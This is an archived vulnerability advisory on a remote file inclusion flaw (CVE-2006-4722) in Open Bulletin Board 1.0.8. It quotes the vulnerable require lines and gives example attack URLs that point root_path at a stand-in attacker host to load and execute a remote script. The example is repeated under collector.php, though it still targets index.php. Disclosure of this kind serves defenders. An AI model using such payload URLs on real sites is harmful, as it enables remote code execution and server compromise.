Bug: Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability ( Ascii Version )

Search:
WLB2

Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability

Published
Credit
Risk
2006.09.18
l0x3
High
CWE
CVE
Local
Remote
N/A
CVE-2006-4722
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

+--------------------------------------------------------------------

+

+ Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: Open Bulletin Board 1.0.8

+ Venedor ...........: http://www.openbb.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Discovered by ..........: Eddy_BAck0o

+ Contact ...........: l0x3[at]hotmail.com

+

+--------------------------------------------------------------------

+--------------------------------------------------------------------

+ ./index Directory ...

~ [index.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ require $root_path . "base.php"; <--- 30 - 380

+ require $root_path . "base.php"; <--- 46 - 380

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm
d

+

+-------------------------------------------------------------------

+

~ [collector.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ root_path = "./"; <--- 24 - 194

+ require $root_path . "base.php"; <--- 159 - 194

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+ Ex -->

http://www.victom.com/index.php?root_path=http://yourevil.com/r0x.txt?cm
d

+

+-------------------------------------------------------------------

+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ; Qptan ] ;....

+--------------------------------------------------------------------

+--------------------------------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version